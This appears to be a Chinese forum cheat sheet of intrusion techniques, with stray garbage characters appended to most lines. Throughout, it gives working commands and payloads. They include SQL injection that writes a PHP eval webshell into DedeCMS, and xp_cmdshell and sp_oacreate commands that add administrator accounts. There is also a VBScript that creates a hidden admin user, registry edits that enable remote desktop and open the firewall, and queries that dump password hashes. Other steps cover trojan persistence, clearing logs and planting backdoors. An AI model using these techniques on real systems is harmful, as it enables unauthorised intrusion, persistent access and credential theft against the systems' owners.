& [3 w" O: |& s& V8 S: R9 e1.net user administrator /passwordreq:no1 u3 ?0 u2 ~: L/ W
这句的意思是"administrator帐号不需要密码",如果可以成功执行的话,3389登陆时administrator的密码就可以留空,直接登陆了,然后进去后再net user administrator /passwordreq:yes恢复就可以了# g1 `4 M, W H
2.比较巧妙的建克隆号的步骤
! y0 D# [3 g v2 S% ]# F先建一个user的用户
2 d0 {+ J+ w! S0 W+ \# O9 w然后导出注册表。然后在计算机管理里删掉
" `7 \9 H2 ]. w8 v在导入,在添加为管理员组* u; a) M6 j/ f3 k
3.查radmin密码; _& M u6 r& K. W- _
reg save HKEY_LOCAL_MACHINE\SYSTEM\RAdmin c:\a.reg, |& l* Z8 B, J2 R( z- k5 K
4.[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Window NT\CurrentVersion\Image File execution options]
9 f+ u' K, h5 Y# W/ _$ ^建立一个"services.exe"的项, J" ], o& X/ M5 v1 M* @7 a3 W
再在其下面建立(字符串值)3 b9 j1 q C9 M& x- U/ u* s
键值为mu ma的全路径0 U) W/ h% {* z6 f1 ?9 Z7 x, M, D
5.runas /user:guest cmd
6 C# W3 O, P3 O1 ?测试用户权限!
\+ V* W2 R, e( G" ^9 E6.、 tlntadmn config sec = -ntlm exec master.dbo.xp_cmdshell \'tlntadmn config sec = -ntlm\'-- 其实是利用了tlntadmn这个命令。想要详细了解,输入/?看看吧。(这个是需要管理员权限的哦)建立相同用户通过ntml验证就不必我说了吧?, I$ t' K6 R- v8 L# F" z. l8 _
7.入侵后漏洞修补、痕迹清理,后门置放:
/ E. y6 E. n+ G! N9 u基础漏洞必须修补,如SU提权,SA注入等。DBO注入可以考虑干掉xp_treelist,xp_regread自行记得web目录;你一定要记得清理痕迹~sqlserver连接使用企业管理器连接较好,使用查询分析器会留下记录,位于HKEY_CURRENT_USER\Software \Microsoft\Microsoft SQL Server\80\Tools\Client\PrefServers。删除之;IISlog的清除可不要使用AIO类的工具直接完全删除日志~可以选择logcleaner类工具只删除指定IP的访问记录,如果你能gina到管理员密码则通过登陆他清理日志并通过WYWZ进行最后的痕迹清理。话说回来手动清理会比较安全。最后留下一个无日志记录的后门。一句话后门数个,标准后门,cfm后门我一般都不会少。要修改时间的哦~还有一招比较狠滴,如果这个机器只是台普通的肉鸡,放个TXT到管理员桌面吧~提醒他你入侵了,放置了某个后门,添加了某个用户~(当然不是你真正滴重要后门~)要他清理掉。这样你有很大的可能性得以保留你的真实后门
' d9 Q9 k, v) w; V8.declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c( k# M+ ~: e6 x& |+ W% p4 U; f7 N
: t, R( G Z Y( V- _( g0 n% C; i
for example8 V/ }- c, d8 H4 { R$ ?
1 Q+ u3 j; \7 \* @
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net user aptime aptime /add': U" c% t& ^* |
; G" D/ t% L5 }! O; g$ H2 O
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net localgroup administrator aptime /add'
, E" k1 [* D- v9 Y) k% \0 s. m+ F! h V. ?; C5 |* o
9:MSSQL SERVER 2005默认把xpcmdshell 给ON了9 a4 z+ R6 B1 o6 ]% ?; l# g
如果要启用的话就必须把他加到高级用户模式 z# z h) u3 p" x" |7 Z
可以直接在注入点那里直接注入
9 v7 }' W5 c* S+ ~( o6 rid=5;EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;--
+ ]3 t" l: _+ t; I7 Y; \; s然后;dbcc addextendedproc("xp_cmdshell","xplog70.dll");--
: C0 f9 c# }9 C [" U' V7 y Y或者
+ i* Q6 F y; ]. r5 }/ Dsp_addextendedproc xp_cmdshell,@dllname='xplog70.dll'* _/ J }; V: `& e5 r
来恢复cmdshell。/ C9 \0 M9 N& A; V: s( [
+ s+ \- ^3 F. K, O" @) | G3 M5 T
分析器* K' a: n8 E2 U
EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;--0 ^+ r; }7 E7 w9 x/ X7 v+ n
然后;dbcc addextendedproc("xp_cmdshell","xplog70.dll")
" U* y1 U9 Y6 k) Z10.xp_cmdshell新的恢复办法
5 m% m) z" G+ u5 Uxp_cmdshell新的恢复办法
. d0 Y0 C# }! b+ [9 W扩展储存过程被删除以后可以有很简单的办法恢复:# P0 @6 X' _, ?4 Y
删除( Z: j* g7 R0 J8 ~/ m
drop procedure sp_addextendedproc I- V+ @1 I4 F: m* H$ ]
drop procedure sp_oacreate% q# H2 a5 ~# L
exec sp_dropextendedproc 'xp_cmdshell'& }( r4 \ y% f; y( P' m5 a$ p
" |3 J3 s* Z! k, G( n
恢复
7 {/ O" h) Q* ^/ f" c. \* |dbcc addextendedproc ("sp_oacreate","odsole70.dll")# k8 [$ _" z+ t) A4 Q" c1 q
dbcc addextendedproc ("xp_cmdshell","xplog70.dll")
9 ?$ ~/ m) m$ X2 I0 v7 J0 n. Z% F" o0 H- x' {) E
这样可以直接恢复,不用去管sp_addextendedproc是不是存在* w2 Y; d3 T' z; D: Q
5 ?% p; J4 B5 m3 t2 x-----------------------------, y' M! ~$ @, ?' o( n
) N) ^* a! m, _, S删除扩展存储过过程xp_cmdshell的语句:
7 B. B$ d1 Q" M0 X0 v* R# K' kexec sp_dropextendedproc 'xp_cmdshell'. w! h- q2 k4 t8 s) `6 B
% P/ @# n* C1 F$ Z" ]; R1 D+ A7 s1 z
恢复cmdshell的sql语句4 f2 ~1 k$ o* |, l5 |! w, y) i+ P# l
exec sp_addextendedproc xp_cmdshell ,@dllname ='xplog70.dll'
- p# y7 j( c G- o* i+ X! p- K; i9 _" `" b- |8 v( }4 g
) g) y# S+ W3 ~/ f
开启cmdshell的sql语句( C% H2 _) o7 ?1 s) s
: |) P; b2 _/ `" {8 Y" ~/ d2 ^/ t3 ~2 Rexec sp_addextendedproc xp_cmdshell ,@dllname ='xplog70.dll'
8 z! Y) Z; ]9 z1 s& j8 U% y, m- _' e5 t3 ~/ w7 G3 |
判断存储扩展是否存在
( [6 W B! `- ~select count(*) from master.dbo.sysobjects where xtype='x' and name='xp_cmdshell'4 f$ R8 n- f: D) C' c0 y" S+ d# h3 \
返回结果为1就ok
, i6 _4 ]# ]. Y3 Q; R; H" p
) Z+ ]+ }- N* p( u2 n7 `% v! F恢复xp_cmdshell- a: m- z1 z8 b
exec master.dbo.addextendedproc 'xp_cmdshell','xplog70.dll';select count(*) from master.dbo.sysobjects where xtype='x' and name='xp_cmdshell'4 t2 D" b% S6 ?
返回结果为1就ok
: S8 b9 E/ _( Z7 Z1 {2 S7 H5 ]9 D, {
否则上传xplog7.0.dll
+ R% H0 n5 ?3 E& [$ p- ` F# \exec master.dbo.addextendedproc 'xp_cmdshell','c:\winnt\system32\xplog70.dll'
* b6 [" A/ X3 E& K3 m! y9 Q, d0 O2 k* x; |5 p7 w- U
堵上cmdshell的sql语句& T% g+ g1 q, e( Z8 s" ~
sp_dropextendedproc "xp_cmdshel1 p5 R; e; I% `1 Y( [
-------------------------! B* @4 U9 u, H1 d5 P) u5 ]; o
清除3389的登录记录用一条系统自带的命令:* C8 D+ G( J7 m
reg delete "hkcu\Software\Microsoft\Terminal Server Client" /f; n0 ~7 Z8 l% ^8 y) D
. q6 T# Z# Q6 t# l然后删除当前帐户的 My Documents 文件夹下的 Default.rdp 文件* y8 Q7 m- K4 \* q F
在 mysql里查看当前用户的权限# ~1 \. j6 E. V1 n1 r4 G6 C* f6 K
show grants for
2 f, l" P) b8 o
, J- i3 e1 [& N+ c以下语句具有和ROOT用户一样的权限。大家在拿站时应该碰到过。root用户的mysql,只可以本地连,对外拒绝连接。以下方法可以帮助你解决这个问题了,下面的语句功能是,建立一个用户为itpro 密码123 权限为和root一样。允许任意主机连接。这样你可以方便进行在本地远程操作数据库了。) i- Y; ^3 b0 L8 m
$ N% v& u* k2 V1 w0 Z4 B' E
2 P: J! I5 E; P* y1 z0 ]
Create USER 'itpro'@'%' IDENTIFIED BY '123';7 X7 Q$ n7 R1 B/ C( A5 s
, z: q% a6 ^) Q8 m
GRANT ALL PRIVILEGES ON *.* TO 'itpro'@'%' IDENTIFIED BY '123'WITH GRANT OPTION# i+ F8 G. x4 j5 j3 c$ Y4 j( P* e
0 G- N' B, O- f7 Q, k
MAX_QUERIES_PER_HOUR 0 MAX_CONNECTIONS_PER_HOUR 0) ?# o% X8 R' x( `% L% h( f
# w1 ]1 _% A# ?' m7 ^MAX_UpdateS_PER_HOUR 0 MAX_USER_CONNECTIONS 0;+ {& Q! o9 C# D% h) A
5 @: {; E6 m" _' h3 U' @; Y3 `# o搞完事记得删除脚印哟。
; b F% O3 y3 d7 M
' Y: W9 Q5 K0 ]* |/ C' L3 rDrop USER 'itpro'@'%';
' L$ y8 \' D3 n, p- }1 U$ ~
+ l2 v* R8 X% I ?Drop DATABASE IF EXISTS `itpro` ;: B' [2 [# U: e* A* L5 u
4 M A6 ~' _6 \1 i8 O
当前用户获取system权限
0 Y3 Z, W: [' }: N, ~sc Create SuperCMD binPath= "cmd /K start" type= own type= interact& g4 ~( s! w6 c; v4 F7 Y
sc start SuperCMD
; I! H v3 R9 u- y程序代码
4 a9 t4 M' i+ d4 A( o9 a) [<SCRIPT LANGUAGE="VBScript">* h4 U, |5 Y2 M9 y( `: }2 e g
set wsnetwork=CreateObject("WSCRIPT.NETWORK") n( Z z% Q1 j% Q) b
os="WinNT://"&wsnetwork.ComputerName9 c9 E5 l( }) H, I
Set ob=GetObject(os) c: g {0 K: J. o. K* ]/ j1 H
Set oe=GetObject(os&"/Administrators,group")
% |6 t2 b+ U. ]5 t; SSet od=ob.Create("user","nosec")3 |5 d* J& w! f4 Y! w4 `
od.SetPassword "123456abc!@#"
# p( H. {+ m# Eod.SetInfo
( r6 d7 T: G. e* vSet of=GetObject(os&"/nosec",user) H7 Q6 ?. F& Z; I' G. k
oe.add os&"/nosec"% D; v J3 J( Y' Q* ~
</Script>
8 j2 {4 q" s7 f3 W<script language=javascript>window.close();</script>
4 y$ H$ r' X: S- V9 m- K, Y A
( v2 E2 K0 K9 U6 c) G: q+ a) M* ^! R+ N3 P F# z1 [6 o) s( X
( i7 m1 y( W; g! ?$ v( G0 a \, m
8 Y5 I% ^/ a' B- `. ]: y. ?* A
突破验证码限制入后台拿shell) G5 x |9 c+ v' |
程序代码
* D0 |* G: O8 m% i0 G- lREGEDIT4 & O% ~( v4 v* f, a, K9 ~0 \( i0 S
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Security]
" a% L& Y5 j! F/ L$ V: U"BlockXBM"=dword:00000000: Z! J4 u* c% n' p* V8 O& x( \) l
* Y. }' q; V, w/ R
保存为code.reg,导入注册表,重器IE
; S* Y: r2 ~6 L# E# j5 I就可以了- x3 l( B* `! D9 v& Z
union写马9 H7 C: g. Y7 t7 s
程序代码
$ U% t) v( n) T h. N+ z1 hwww.baidu.com/plus/infosearch.php?action=search&q=%cf'%20union%20select%201,2,3,4,'<?php%20eval($_POST[cmd])?>',6+into+outfile+'D:\\wwwroot\\duizhang.php'+/*" z: i6 v+ T" p# a9 s
: x$ o$ m5 g2 U5 A; N应用在dedecms注射漏洞上,无后台写马
! U! p" i+ q" Q+ Ydedecms后台,无文件管理器,没有outfile权限的时候
o0 B/ K2 Q+ Z8 b* q7 S在插件管理-病毒扫描里
4 Q l }- r" Y$ g6 v0 z写一句话进include/config_hand.php里
1 v5 P* i8 C; g4 D程序代码
" k! c, v8 ^9 \/ b' r9 \: z( P>';?><?php @eval($_POST[cmd]);?>
- w- R% {% r( K3 A' A+ b5 q
' x) h& d6 I1 h# b9 K2 f
: B* M+ A- L1 `" I如上格式1 X( E! `2 a3 z! x, w8 b3 O
3 F+ x4 V! o! T- x9 e& R, P
oracle中用低权限用户登陆后可执行如下语句查询sys等用户hash然后用cain破解. ^( W- E2 T" ?! K* N7 b% a4 g
程序代码; l1 d8 ?5 c _) u% s5 c
select username,password from dba_users;
' i% N1 A4 Z6 G. l4 L- ^$ M/ {9 ^# O+ O7 h2 q4 l8 y3 B
2 ^9 E4 X0 ~1 V
mysql远程连接用户# s! e X8 x) B# ~0 y
程序代码7 m: g, _/ j1 S! v4 W
/ `3 \9 t" B0 t( cCreate USER 'nosec'@'%' IDENTIFIED BY 'fuckme';
; E. ~ p+ r6 _2 nGRANT ALL PRIVILEGES ON *.* TO 'nosec'@'%' IDENTIFIED BY 'fuckme' WITH GRANT OPTION
; L' C/ [& Q! c' GMAX_QUERIES_PER_HOUR 0 MAX_CONNECTIONS_PER_HOUR 0
" V$ |; ~$ d+ f, ]( B' [; \. wMAX_UpdateS_PER_HOUR 0 MAX_USER_CONNECTIONS 0;% @0 v4 A6 }1 f5 \0 Y
5 \6 ~2 y4 a+ J# O0 C; N* s( N: X
/ X1 |. R% ~0 f, A6 J8 k
- N) k% S j$ T* k
8 d; P, r3 U7 ?0 J" t( t* `echo y |reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0
5 \3 h# S3 L# P; V/ \% X4 P* W+ F
) T! p: h( h6 |5 j( r2 u/ V2 n1.查询终端端口# Q8 N) G7 y5 Q6 D8 o
8 B; w& ?7 t. exp&2003:REG query HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\WinStations\RDP-Tcp /v PortNumber
* z! H4 ] @0 W4 z/ ]7 [
k% q6 a" }6 A: v" t通用:regedit /e tsp.reg "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal server\Wds\rdpwd\Tds\tcp"$ `* }0 [7 F% F$ g |. U8 k* |: I9 i3 R" r
type tsp.reg
. {4 q* Q$ q! y1 Q8 {8 S U8 ~0 D) L O8 i" [+ v. V* ^3 o
2.开启XP&2003终端服务/ e6 \$ @2 t7 J( @3 @
1 Q% k7 I; b' M: D0 o) `6 c5 U$ a3 G# p) g9 ?4 F
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 0 /f% l: {1 h- ]; v H: k4 C
( O2 M! l; l) E) ~. q" A! T1 V( x
# C! W" `0 V& x- b: g5 C. g/ nREG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f
2 A3 J& g9 ~5 l/ w/ |' c7 S2 F, ~4 e
* x. d3 A: k# \# T% Q3.更改终端端口为20008(0x4E28)
" n% [5 {% _6 U8 |. I7 i
3 F/ C" a n! A5 HREG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\Wds\rdpwd\Tds\tcp /v PortNumber /t REG_DWORD /d 0x4E28 /f0 F6 j( Q0 G& x* [1 e
! `2 w. U$ u" l+ b8 T0 n6 LREG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\WinStations\RDP-Tcp /v PortNumber /t REG_DWORD /d 0x4E28 /f
8 f& P: B4 W" }5 l# P
8 G* ?# u% S( a1 w' U$ w4.取消xp&2003系统防火墙对终端服务3389端口的限制及IP连接的限制2 ~# L) e+ J0 h6 C3 O
* K" v, G' I% g6 M2 I
REG ADD HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List /v 3389:TCP /t REG_SZ /d 3389:TCP:*:Enabledxpsp2res.dll,-22009 /f7 v8 y0 D7 L3 E2 Z& V- M
* x8 e" a) ?% V0 X* j1 r4 q5 K. O! X: I
5.开启Win2000的终端,端口为3389(需重启)
! J; M! H2 _" E) W4 |, Y% t; Y. R: _
echo Windows Registry Editor Version 5.00 >2000.reg , M/ c* M! n) M6 v& `/ I0 I
echo. >>2000.reg
2 B6 \2 N$ _( Mecho [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\netcache] >>2000.reg 9 l, B+ V8 T) X" y" R+ [" G5 a* L& K
echo "Enabled"="0" >>2000.reg
+ B" b$ ~# m e5 S7 ?2 \7 mecho [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon] >>2000.reg & n2 r1 f U& |* J
echo "ShutdownWithoutLogon"="0" >>2000.reg : u6 c4 ^) x7 t" G+ _, m0 T8 e
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer] >>2000.reg 1 O+ z/ ^4 ?4 i6 W
echo "EnableAdminTSRemote"=dword:00000001 >>2000.reg
* e6 O8 ~* o1 k5 r, {, B% }echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server] >>2000.reg
6 S' i# n! F0 t0 ^/ l& \' pecho "TSEnabled"=dword:00000001 >>2000.reg
) z' \* @5 l2 d0 g2 w8 ]6 g2 `& Qecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermDD] >>2000.reg
5 r K, J9 y b, e' L* e1 V$ }9 A8 necho "Start"=dword:00000002 >>2000.reg : v' f3 F% e$ \8 B6 \# ]' y" b
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService] >>2000.reg 2 q8 ~ ~, d" c9 |6 J
echo "Start"=dword:00000002 >>2000.reg : a# l( R6 F% z1 m- I3 B' z7 A0 j- i
echo [HKEY_USERS\.DEFAULT\Keyboard Layout\Toggle] >>2000.reg
, x) q) g/ l' c G( z. E" X" Y( qecho "Hotkey"="1" >>2000.reg + y1 h1 P1 q7 \
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp] >>2000.reg % q$ l; b; B4 S( S9 H7 d9 L' z6 M
echo "ortNumber"=dword:00000D3D >>2000.reg
{5 r% f1 _* z& P0 h/ K4 e( Necho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp] >>2000.reg 0 B& l3 c# I( a, _3 C
echo "ortNumber"=dword:00000D3D >>2000.reg
2 y! Z6 \7 M+ J: h3 s8 ~) w
2 s9 L n' {4 a1 w* t6.强行重启Win2000&Win2003系统(执行完最后一条一句后自动重启)7 ?5 R% { t3 }' ?
7 [8 M5 Y r/ f
@ECHO OFF & cd/d %temp% & echo [version] > restart.inf
- {& E+ y5 y% i3 H& k(set inf=InstallHinfSection DefaultInstall)+ {% W7 l) v: Q0 `2 i+ P& C7 J
echo signature=$chicago$ >> restart.inf
: `, x# n* |! z4 q5 h( Mecho [defaultinstall] >> restart.inf
2 c" f. n/ X: L9 J* Krundll32 setupapi,%inf% 1 %temp%\restart.inf
+ q q) q( z7 _. \( l n5 t5 _& U. \2 V* W3 s L4 |
" F" `' ?3 c* ~7 e2 g2 y0 F9 O
7.禁用TCP/IP端口筛选 (需重启), p5 `' k4 g3 }5 n# m: O& V3 Q- e5 S
4 A. b1 [+ k) T5 I* @% i, g+ O
REG ADD HKLM\SYSTEM\ControlSet001\Services\Tcpip\parameters /v EnableSecurityFilters /t REG_DWORD /d 0 /f; g: O! w( M1 w; s1 \; d# f' N" y
3 H) T. P: ~: Y; K/ C& q8.终端超出最大连接数时可用下面的命令来连接
6 R6 ~/ m2 f) J9 d) D
# y0 R. d7 Y$ k+ P! J0 Dmstsc /v:ip:3389 /console
6 ~0 w% y4 r7 _5 R; }; t/ i, d* Y) c7 j4 |3 ~: x8 ?
9.调整NTFS分区权限5 Z5 ^+ n4 A7 k6 e. j
' F4 z2 G4 P# z, V! qcacls c: /e /t /g everyone:F (所有人对c盘都有一切权利)
, v# c1 _% `& U
; H4 r! P" q) b! xcacls %systemroot%\system32\*.exe /d everyone (拒绝所有人访问system32中exe文件)
6 C: r9 J9 Z3 r4 c9 D) ]* ~
: a7 q: |- |' K7 G0 z9 }------------------------------------------------------
0 M' S, g L4 _3389.vbs
' w3 v6 t! f/ ?' ^& n8 B8 ~On Error Resume Next( z1 o3 M8 C4 ?0 H3 Q5 K1 J# h/ O
const HKEY_LOCAL_MACHINE = &H80000002
8 I+ N' T* o& n, O% A5 E5 zstrComputer = "." l& A$ U. p+ V0 O
Set StdOut = WScript.StdOut$ H; z7 \8 E' g' V; m4 _$ V
Set oreg=GetObject("winmgmts:{impersonationLevel=impersonate}!\\" &_, C- {! X* M" B- {) s
strComputer & "\root\default:StdRegProv")& @6 s& \ f! E* e9 X8 N6 ]7 V
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server"
+ p; g( }4 a1 e: f$ T8 }6 v- ^oreg.CreateKey HKEY_LOCAL_MACHINE,strKeyPath6 G) q/ G+ g% ]' Y- w
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp"
2 }9 ?$ l! d b4 a, B0 V* K& Loreg.CreateKey HKEY_LOCAL_MACHINE,strKeyPath$ m i. ]5 i; E/ U# p+ g' A) H2 Z
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp"! z/ x5 ]5 y2 S1 a, D- r
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server"
, L) M+ Y2 Y5 F5 G: I- a; L; GstrValueName = "fDenyTSConnections"4 T6 L' S; g* C: I Y7 s1 L( v; [
dwValue = 07 {$ d, W8 ~* M4 t0 m- J. l0 ?4 F
oreg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue& a) k% [ C( K0 j
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp"2 y W9 f8 i; ?" T
strValueName = "ortNumber"1 {' l; e1 P/ O
dwValue = 3389) X! A9 G# ?* y
oreg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue) c* _" T; A1 m$ `0 d, R, n( O" D
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp"
: Z* n; O; [+ {0 s" w. estrValueName = "ortNumber"5 n* w, T$ R) ~' W* y1 q8 v( u
dwValue = 3389. w0 y$ m! n% e% g8 c: Z/ o
oreg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue" Y4 t3 {. O9 K, X
Set R = CreateObject("WScript.Shell")
& g9 H5 u" P; fR.run("Shutdown.exe -f -r -t 0")
- g$ }; @. Y- k" ~ f) K0 U3 |8 A( R' Z( j
删除awgina.dll的注册表键值
0 a" t9 y3 M; |$ r. _2 h1 W程序代码
+ C4 N4 {. a! u) W# ^6 y( |) A. C: e) Y( K8 i) I7 x
reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v GinaDLL /f
% _8 B" v+ f, V! v# r! |5 e) j+ n( |
: t3 Z2 Y0 T: `* z/ e6 }: M8 \ P3 p( Q1 n. O
* A& I+ v) n4 W9 d% ]! F
程序代码
- i. z; H6 y4 ?, M+ ]HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa\NoLMHash
$ \+ o" t" E9 ^4 R) h
+ x$ c5 A3 {; x+ G+ R" l% I4 q6 I设置为1,关闭LM Hash
- `2 g1 B7 {' {6 I: V8 \- L+ r* A- X, y: g# x/ x
数据库安全:入侵Oracle数据库常用操作命令% v$ f8 k; f6 r0 s9 V9 h* U3 z& m9 K
最近遇到一个使用了Oracle数据库的服务器,在狂学Oracle+请教高手后终于搞到了网站后台管理界面的所有用户密码。我发现Oracle操作起来真是太麻烦,为了兄弟们以后少走些弯路,我把入侵当中必需的命令整理出来。
# ^; I: k& H# ^4 u) A! R* m1、su – oracle 不是必需,适合于没有DBA密码时使用,可以不用密码来进入sqlplus界面。
+ i, A! g+ Q1 y. u( B2、sqlplus /nolog 或sqlplus system/manager 或./sqlplus system/manager@ora9i;. O) v. w4 k5 v: u% [
3、SQL>connect / as sysdba ;(as sysoper)或
% q3 ?3 {! T( q5 @" W }/ C5 o4 pconnect internal/oracle AS SYSDBA ;(scott/tiger)
% ?0 o9 y' Z* r0 ^conn sys/change_on_install as sysdba;7 a5 c* {# X; t, G& U0 I$ x
4、SQL>startup; 启动数据库实例
( k7 }+ M. @/ j( i8 I; ?5、查看当前的所有数据库: select * from v$database;+ x6 m4 J4 S5 l# P% V; H/ _0 \* w
select name from v$database;# l6 K! d; b' V j D- t# s" i/ c
6、desc v$databases; 查看数据库结构字段, p7 M5 u: p0 s m& B
7、怎样查看哪些用户拥有SYSDBA、SYSOPER权限:
& g' }' E% x7 N) P* W' U2 v* GSQL>select * from V_$PWFILE_USERS;8 R2 ^. G4 d1 M, N7 K: W
Show user;查看当前数据库连接用户
0 l9 _8 ?0 J8 p7 ?8、进入test数据库:database test;
/ H! k$ f" J5 i9、查看所有的数据库实例:select * from v$instance;
7 z+ v: w6 R' e2 {1 M$ ^% K如:ora9i2 `; ^5 K8 E3 O2 k' T" Q, Q
10、查看当前库的所有数据表:
) f4 a4 V" _: {9 x- pSQL> select TABLE_NAME from all_tables;
7 V P; P/ h+ c5 T5 P1 Iselect * from all_tables;6 D. s: l& Z: o' T* f' _% c
SQL> select table_name from all_tables where table_name like '%u%';
* ~$ n3 w/ ^6 p' h4 B0 G( ^TABLE_NAME1 h5 S& v/ \+ N/ g
------------------------------0 t# F! a6 K& `1 Z! m* `
_default_auditing_options_. L- o d, O1 R
11、查看表结构:desc all_tables;
' T1 B3 w+ G0 s4 p. |- l12、显示CQI.T_BBS_XUSER的所有字段结构:. j! ~9 I- c6 M* u0 N
desc CQI.T_BBS_XUSER;' g: g; s- g) M ?( B$ M5 k' h
13、获得CQI.T_BBS_XUSER表中的记录:( f4 Q: a' ^+ C2 V
select * from CQI.T_BBS_XUSER;
5 p: [- f/ ~* d! D14、增加数据库用户:(test11/test)
- e$ l5 l0 T' V( q# dcreate user test11 identified by test default tablespace users Temporary TABLESPACE Temp;
- X: x1 i( R0 N, f15、用户授权:
, Y z. j$ t* ?5 Y& q7 Q, Ugrant connect,resource,dba to test11;
0 h1 q5 o! H8 e6 cgrant sysdba to test11;( D5 z3 I+ p6 H# M- {
commit;! r- F% D2 P6 c% b% j) g! a9 ?
16、更改数据库用户的密码:(将sys与system的密码改为test.)
' ~, e8 b1 X N3 w7 b2 e* D0 s$ Nalter user sys indentified by test;9 j" s. D" A R1 A0 i! P. h" n0 s; ~
alter user system indentified by test;- f# w* {6 g9 ^4 u
; l) L( I' A, d/ M2 Q0 V
applicationContext-util.xml7 G9 F: U+ ^* k' S( l
applicationContext.xml
1 E7 h* c, d& w# ^9 astruts-config.xml
0 p4 E0 E! G" t& [ Aweb.xml
+ V# j1 I1 D8 t$ K8 @server.xml; G$ j A* C/ m% ~
tomcat-users.xml
* ^- f: t2 I! F% Z( h0 K8 ]hibernate.cfg.xml* f+ K- D% f7 w/ Y
database_pool_config.xml
% C- x% u7 W p& J e) @8 Q
) L' t A7 m g1 k1 @! S8 W% K! R4 R3 Y/ `* i8 E6 d
\WEB-INF\classes\hibernate.cfg.xml 数据库连接配置7 l% Q0 i4 D. \0 x* D
\WEB-INF\server.xml 类似http.conf+mysql.ini+php.ini( e" ~( o- f/ s5 t) \+ H/ {
\WEB-INF\struts-config.xml 文件目录结构
9 g+ |+ i' N( b! w
; X8 h3 e$ w" h$ aspring.properties 里边包含hibernate.cfg.xml的名称, C* W1 X3 K) q$ ?! p3 G: `+ p
- p0 E' p$ z4 _8 e' z
5 |+ e* o( \: u7 z$ `3 I6 R! @7 wC:\Program Files\Apache Software Foundation\Tomcat 5.5\conf\tomcat-users.xml
$ R& x" M1 ~: I0 J/ q
; R- p1 G. ^; m/ E如果都找不到 那就看看class文件吧。。
# Q8 b# k+ C( g& E+ H/ b# C
. b+ Q( g3 ~& ?0 |( d8 R测试1:
! e- K9 O. }* k, F/ V8 pSELECT top 1 name=STUFF((SELECT ','+[name] FROM sysobjects t where xtype='U' FOR XML PATH('')), 1, 1, '') FROM sysobjects t1
' a" m$ C( G. N" N, T
9 K/ Y3 m- a, @测试2:( \. ^# t( g4 D: b) R
% c8 C, ?8 I: S
create table dirs(paths varchar(100),paths1 varchar(100), id int)
. D/ l; R: k1 ~. J- K k; g; ] Q9 J3 ]" ^
delete dirs;insert dirs exec master.dbo.xp_dirtree 'c:\',1,1--
) ], _7 W" d, A1 V+ K; V/ q3 g9 w- t3 H8 \5 W+ [, r: I, l. K+ j
SELECT top 1 paths=STUFF((SELECT ','+[paths] FROM dirs FOR XML PATH('')), 1, 1, '') FROM dirs t1
- A' s9 R$ `: H' c' x a$ Q! W$ B
查看虚拟机中的共享文件:
' ^) k( Q2 F n6 \6 l在虚拟机中的cmd中执行0 T5 I4 X& n) Y3 \: Y7 Z& I
\\.host\Shared Folders& v1 H3 W) O2 U% o$ w
: Z8 X3 a- G. |! V4 mcmdshell下找终端的技巧4 [3 Y/ @, Q Q2 g$ U. {
找终端: . @7 f) y* a R r
第一步: Tasklist/SVC 列出所有进程,系统服务及其对应的PID值!
1 I9 N: w' x4 w9 j. Y$ a 而终端所对应的服务名为:TermService
8 Z6 g0 h% I3 i. R+ L/ R; _7 `$ J5 L第二步:用netstat -ano命令,列出所有端口对应的PID值!
3 [0 k" z" ~5 n! q" X. f2 G/ n" Z- ? 找到PID值所对应的端口
) ~. `8 H, r$ Z: i; f6 m
* d% K) q' _! [- s# A' }/ ^. e. W查询sql server 2005中的密码hash& m; N. \& m2 R" }
SELECT password_hash FROM sys.sql_logins where name='sa'* E; V* M% a- Y4 }( T, X
